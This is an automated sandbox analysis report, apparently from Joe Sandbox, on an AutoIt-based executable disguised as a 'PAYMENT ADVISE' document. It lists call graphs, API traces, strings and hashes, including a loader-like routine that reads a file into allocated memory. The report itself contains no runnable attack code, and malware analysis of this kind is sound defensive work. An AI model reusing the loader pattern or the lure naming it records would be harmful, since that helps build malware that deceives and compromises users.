85095->84816 85096->84832 85097->84829 85098->84847 85099->84870 85100->84870 85101->84870 85102->84859 85103->84876 85104->84885 85105->84881 85106->84889 85107->84894 85108->84894 85109->84832 85110->84788 84433 46d22f 84436 46d098 84433->84436 84435 46d241 84437 46d0b5 84436->84437 84438 46d115 84437->84438 84439 46d0b9 84437->84439 84491 45c216 78 API calls 84438->84491 84441 41171a 75 API calls 84439->84441 84443 46d0c0 84441->84443 84442 46d126 84445 46d0f8 84442->84445 84451 46d142 84442->84451 84444 46d0cc 84443->84444 84484 40d940 76 API calls 84443->84484 84485 453063 84444->84485 84447 4092c0 VariantClear 84445->84447 84449 46d0fd 84447->84449 84449->84435 84452 46d1c8 84451->84452 84455 46d158 84451->84455 84497 4676a3 78 API calls 84452->84497 84458 453063 111 API calls 84455->84458 84456 46d0ea 84456->84451 84459 46d0ee 84456->84459 84457 46d1ce 84498 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84457->84498 84467 46d15e 84458->84467 84459->84445 84490 44ade5 CloseHandle ctype 84459->84490 84460 46d18d 84492 467fce 82 API calls 84460->84492 84464 46d196 84493 4013a0 75 API calls 84464->84493 84465 46d1e7 84469 4092c0 VariantClear 84465->84469 84478 46d194 84465->84478 84467->84460 84467->84464 84468 46d1a2 84494 40df50 75 API calls 84468->84494 84469->84478 84471 46d1ac 84495 40d3b0 75 API calls 2 library calls 84471->84495 84473 46d224 84473->84435 84474 46d1b8 84496 467fce 82 API calls 84474->84496 84477 46d216 84499 44ade5 CloseHandle ctype 84477->84499 84478->84473 84480 40d900 84478->84480 84481 40d917 84480->84481 84482 40d909 84480->84482 84481->84482 84483 40d91c CloseHandle 84481->84483 84482->84477 84483->84477 84484->84444 84486 45306e 84485->84486 84487 45307a 84485->84487 84486->84487 84500 452e2a 111 API calls 5 library calls 84486->84500 84489 40dfa0 83 API calls 84487->84489 84489->84456 84490->84445 84491->84442 84492->84478 84493->84468 84494->84471 84495->84474 84496->84478 84497->84457 84498->84465 84499->84473 84500->84487 85111 42919b 85116 40ef10 85111->85116 85114 411421 __cinit 74 API calls 85115 4291aa 85114->85115 85117 41171a 75 API calls 85116->85117 85118 40ef17 85117->85118 85119 42ad48 85118->85119 85124 40ef40 74 API calls __cinit 85118->85124 85121 40ef2a 85125 40e470 85121->85125 85124->85121 85126 40c060 75 API calls 85125->85126 85127 40e483 GetVersionExW 85126->85127 85128 4021e0 75 API calls 85127->85128 85129 40e4bb 85128->85129 85151 40e600 85129->85151 85136 42accc 85137 42ad28 GetSystemInfo 85136->85137 85141 42ad38 GetSystemInfo 85137->85141 85138 40e557 GetCurrentProcess 85171 40ee30 LoadLibraryA GetProcAddress 85138->85171 85139 40e56c 85139->85141 85164 40eee0 85139->85164 85144 40e5c9 85168 40eea0 85144->85168 85147 40e5e0 85149 40e5f1 FreeLibrary 85147->85149 85150 40e5f4 85147->85150 85148 40e5dd FreeLibrary 85148->85147 85149->85150 85150->85114 85152 40e60b 85151->85152 85153 40c740 75 API calls 85152->85153 85154 40e4c2 85153->85154 85155 40e620 85154->85155 85156 40e62a 85155->85156 85157 42ac93 85156->85157 85158 40c740 75 API calls 85156->85158 85159 40e4ce 85158->85159 85159->85136 85160 40ee70 85159->85160 85161 40e551 85160->85161 85162 40ee76 LoadLibraryA 85160->85162 85161->85138 85161->85139 85162->85161 85163 40ee87 GetProcAddress 85162->85163 85163->85161 85165 40e5bf 85164->85165 85166 40eee6 LoadLibraryA 85164->85166 85165->85137 85165->85144 85166->85165 85167 40eef7 GetProcAddress 85166->85167 85167->85165 85172 40eec0 LoadLibraryA GetProcAddress 85168->85172 85170 40e5d3 GetNativeSystemInfo 85170->85147 85170->85148 85171->85139 85172->85170 85173 3fa9c00 85187 3fa7850 85173->85187 85175 3fa9cc7 85190 3fa9af0 85175->85190 85177 3fa9cf0 CreateFileW 85179 3fa9d3f 85177->85179 85180 3fa9d44 85177->85180 85180->85179 85181 3fa9d5b VirtualAlloc 85180->85181 85181->85179 85182 3fa9d79 ReadFile 85181->85182 85182->85179 85183 3fa9d94 85182->85183 85184 3fa8af0 13 API calls 85183->85184 85185 3fa9dc7 85184->85185 85186 3fa9dea ExitProcess 85185->85186 85186->85179 85193 3faacf0 GetPEB 85187->85193 85189 3fa7edb 85189->85175 85191 3fa9af9 Sleep 85190->85191 85192 3fa9b07 85191->85192 85194 3faad1a 85193->85194 85194->85189 85195 42e89e 85202 40c000 85195->85202 85197 42e8ac 85198 409a40 165 API calls 85197->85198 85199 42e8ca 85198->85199 85213 44b92e VariantClear 85199->85213 85201 42f3ae 85203 40c014 85202->85203 85204 40c007 85202->85204 85205 40c01a 85203->85205 85206 40c02c 85203->85206 85214 409210 VariantClear 85204->85214 85215 409210 VariantClear 85205->85215 85209 41171a 75 API calls 85206->85209 85212 40c033 85209->85212 85210 40c00f 85210->85197 85211 40c023 85211->85197 85212->85197 85213->85201 85214->85210 85215->85211 84501 40116e 84502 401119 DefWindowProcW 84501->84502

                          Executed Functions

                          Function 00409A40 Relevance: 32.2, APIs: 15, Strings: 2, Instructions: 2432COMMON
                          Download Yara Rule
                          APIs
                          • _wcslen.LIBCMT ref: 00409A61
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                          • CharUpperBuffW.USER32(?,?), ref: 00409AF5
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BuffCharException@8ThrowUpper_malloc_wcslenstd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                          • String ID: 0vH$4RH
                          • API String ID: 1143807570-2085553193
                          • Opcode ID: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                          • Instruction ID: 7c8f52bff4b3ea9a641e6aac08ab5e1c8beb32691f0f21fab5f23224d73a3634
                          • Opcode Fuzzy Hash: 99d1197353860daa2513f82cc2f46b4e9eeffbfa9250308b68df757a7373a6ee
                          • Instruction Fuzzy Hash: 34238170A043109FD724DF25D480A6BB7E1BF89304F54896EE84A9B391D739EC46CB9B
                          Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1266 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 1275 40e506-40e509 1266->1275 1276 42accc-42acd1 1266->1276 1279 40e540-40e555 call 40ee70 1275->1279 1280 40e50b-40e51c 1275->1280 1277 42acd3-42acdb 1276->1277 1278 42acdd-42ace0 1276->1278 1282 42ad12-42ad20 1277->1282 1283 42ace2-42aceb 1278->1283 1284 42aced-42acf0 1278->1284 1295 40e557-40e573 GetCurrentProcess call 40ee30 1279->1295 1296 40e579-40e5a8 1279->1296 1285 40e522-40e525 1280->1285 1286 42ac9b-42aca7 1280->1286 1294 42ad28-42ad2d GetSystemInfo 1282->1294 1283->1282 1284->1282 1290 42acf2-42ad06 1284->1290 1285->1279 1291 40e527-40e537 1285->1291 1288 42acb2-42acba 1286->1288 1289 42aca9-42acad 1286->1289 1288->1279 1289->1279 1297 42ad08-42ad0c 1290->1297 1298 42ad0e 1290->1298 1292 42acbf-42acc7 1291->1292 1293 40e53d 1291->1293 1292->1279 1293->1279 1300 42ad38-42ad3d GetSystemInfo 1294->1300 1295->1296 1307 40e575 1295->1307 1296->1300 1301 40e5ae-40e5c3 call 40eee0 1296->1301 1297->1282 1298->1282 1301->1294 1306 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 1301->1306 1310 40e5e0-40e5ef 1306->1310 1311 40e5dd-40e5de FreeLibrary 1306->1311 1307->1296 1312 40e5f1-40e5f2 FreeLibrary 1310->1312 1313 40e5f4-40e5ff 1310->1313 1311->1310 1312->1313
                          APIs
                          • GetVersionExW.KERNEL32 ref: 0040E495
                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                          • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                          • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                          • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                          • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                          • String ID: pMH
                          • API String ID: 2923339712-2522892712
                          • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                          • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                          • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                          • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                          Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                          Download Yara Rule
                          APIs
                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: AddressLibraryLoadProc
                          • String ID: IsThemeActive$uxtheme.dll
                          • API String ID: 2574300362-3542929980
                          • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                          • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                          • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                          • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                          Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                          • __wsplitpath.LIBCMT ref: 00410C61
                            • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                          • _wcsncat.LIBCMT ref: 00410C78
                          • __wmakepath.LIBCMT ref: 00410C94
                            • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                            • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                            • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                            • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                          • _wcscpy.LIBCMT ref: 00410CCC
                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                          • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                          • _wcscat.LIBCMT ref: 00429C43
                          • _wcslen.LIBCMT ref: 00429C55
                          • _wcslen.LIBCMT ref: 00429C66
                          • _wcscat.LIBCMT ref: 00429C80
                          • _wcsncpy.LIBCMT ref: 00429CC0
                          • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                          • String ID: Include$Software\AutoIt v3\AutoIt$\
                          • API String ID: 1004883554-2276155026
                          • Opcode ID: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                          • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                          • Opcode Fuzzy Hash: bd70d1de0bf944503d0c9583a27c2bfe501ff96b935e7e88766a5686d489513a
                          • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                          Function 004095C7 Relevance: 21.5, APIs: 14, Instructions: 539sleeptimeCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409A40: _wcslen.LIBCMT ref: 00409A61
                            • Part of subcall function 00409A40: CharUpperBuffW.USER32(?,?), ref: 00409AF5
                          • Sleep.KERNEL32(0000000A), ref: 00409870
                          • timeGetTime.WINMM ref: 00409880
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: BuffCharSleepTimeUpper_wcslentime
                          • String ID:
                          • API String ID: 3219444185-0
                          • Opcode ID: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                          • Instruction ID: 79dfb759edd1749a95aa3438e3198289cebfc990e9c1b7da565b255c5aac8c6d
                          • Opcode Fuzzy Hash: b124ae733e2c30a8df030179fd7ebda2966fc041c6879d6beed06594e2dda547
                          • Instruction Fuzzy Hash: D422F171608342ABC724DF64C984BABB7A0BF89304F14492FE54997392D77CEC45CB9A
                          Function 004161C2 Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1156 4161c2-4161d1 1157 4161d3-4161df 1156->1157 1158 4161fa 1156->1158 1157->1158 1159 4161e1-4161e8 1157->1159 1160 4161fd-416209 call 41aa31 1158->1160 1159->1158 1161 4161ea-4161f8 1159->1161 1164 416213-41621a call 416e29 1160->1164 1165 41620b-416212 call 41616a 1160->1165 1161->1160 1170 416224-416233 call 41843a call 41b669 1164->1170 1171 41621c-416223 call 41616a 1164->1171 1165->1164 1178 416235-41623c call 4117af 1170->1178 1179 41623d-416258 GetCommandLineW call 42235f call 4222b1 1170->1179 1171->1170 1178->1179 1186 416262-416269 call 422082 1179->1186 1187 41625a-416261 call 4117af 1179->1187 1192 416273-41627c call 41186e 1186->1192 1193 41626b-416272 call 4117af 1186->1193 1187->1186 1198 416285-41628d call 42203c 1192->1198 1199 41627e-416284 call 4117af 1192->1199 1193->1192 1204 416295-416297 1198->1204 1205 41628f-416293 1198->1205 1199->1198 1206 416298-4162a0 call 40d7f0 1204->1206 1205->1206 1208 4162a5-4162ab 1206->1208 1209 4162b3-41630f call 411a4b call 4171d1 1208->1209 1210 4162ad-4162ae call 411a1f 1208->1210 1210->1209
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                          • String ID:
                          • API String ID: 2477803136-0
                          • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                          • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                          • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                          • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D
                          Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __fread_nolock$_fseek_wcscpy
                          • String ID: FILE
                          • API String ID: 3888824918-3121273764
                          • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                          • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                          • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                          • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                          Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32 ref: 00410326
                          • RegisterClassExW.USER32 ref: 00410359
                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                          • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                          • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                          • ImageList_ReplaceIcon.COMCTL32(0093F870,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                          • API String ID: 2914291525-1005189915
                          • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                          • Instruction ID: c8c51aded5b6d43d10953d3ded2c15c159303f3bf9a059b11759766ceadcbce4
                          • Opcode Fuzzy Hash: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
                          • Instruction Fuzzy Hash: 9F2129B4518301AFD340DF64D888B4EBFF4FB89704F008A2EF685962A0E7B58144CF5A
                          Function 004101F0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 74windowregistryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • GetSysColorBrush.USER32(0000000F), ref: 004101F9
                          • LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                          • LoadIconW.USER32(?,00000063), ref: 0041021F
                          • LoadIconW.USER32(?,000000A4), ref: 00410232
                          • LoadIconW.USER32(?,000000A2), ref: 00410245
                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                          • RegisterClassExW.USER32 ref: 004102C6
                            • Part of subcall function 004102F0: GetSysColorBrush.USER32 ref: 00410326
                            • Part of subcall function 004102F0: RegisterClassExW.USER32 ref: 00410359
                            • Part of subcall function 004102F0: RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                            • Part of subcall function 004102F0: InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                            • Part of subcall function 004102F0: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                            • Part of subcall function 004102F0: LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                            • Part of subcall function 004102F0: ImageList_ReplaceIcon.COMCTL32(0093F870,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                          • String ID: #$0$PGH
                          • API String ID: 423443420-3673556320
                          • Opcode ID: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                          • Instruction ID: 6be78a7d21e01e6533eb66d2751721d4fd39e3055bf34e10baa21603515e7cea
                          • Opcode Fuzzy Hash: 1033d1e55498f891403c4089579710d7d6683e73571bc8446147a2c837657170
                          • Instruction Fuzzy Hash: 60216DB5A18300AFD310CF59EC84A4A7FE4FB99710F00497FF648972A0D7B599408B99
                          Function 00452574 Relevance: 13.7, APIs: 9, Instructions: 171COMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                          • _fseek.LIBCMT ref: 004525DA
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004523ED
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 00452432
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045244F
                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 0045247D
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 0045248E
                            • Part of subcall function 004523CE: __fread_nolock.LIBCMT ref: 004524AB
                            • Part of subcall function 004523CE: _wcscpy.LIBCMT ref: 004524D9
                          • __fread_nolock.LIBCMT ref: 00452618
                          • __fread_nolock.LIBCMT ref: 00452629
                          • __fread_nolock.LIBCMT ref: 00452644
                          • __fread_nolock.LIBCMT ref: 00452661
                          • _fseek.LIBCMT ref: 0045267D
                          • _malloc.LIBCMT ref: 00452689
                          • _malloc.LIBCMT ref: 00452696
                          • __fread_nolock.LIBCMT ref: 004526A7
                          Memory Dump Source
                          • Source File: 00000000.00000002.1737074873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.1737058278.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737145865.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737165124.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1737235558.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_PAYMENT ADVISE#9879058.jbxd
                          Similarity
                          • API ID: __fread_nolock$_fseek_malloc_wcscpy
                          • String ID:
                          • API String ID: 1911931848-0
                          • Opcode ID: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                          • Instruction ID: daf5751c9f96f1f9c2235ce4d63c31b1673d17b5fb5ed0b9a51dc370059b243a
                          • Opcode Fuzzy Hash: 3570a21b3fd7755177810c9e6035fea9311faeeb4ffbf150b354229a8e607498
                          • Instruction Fuzzy Hash: 47514CB1A08340AFD310DF5AD881A9BF7E9FFC8704F40492EF68887241D77AE5448B5A
                          Function 0040F450 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 126COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
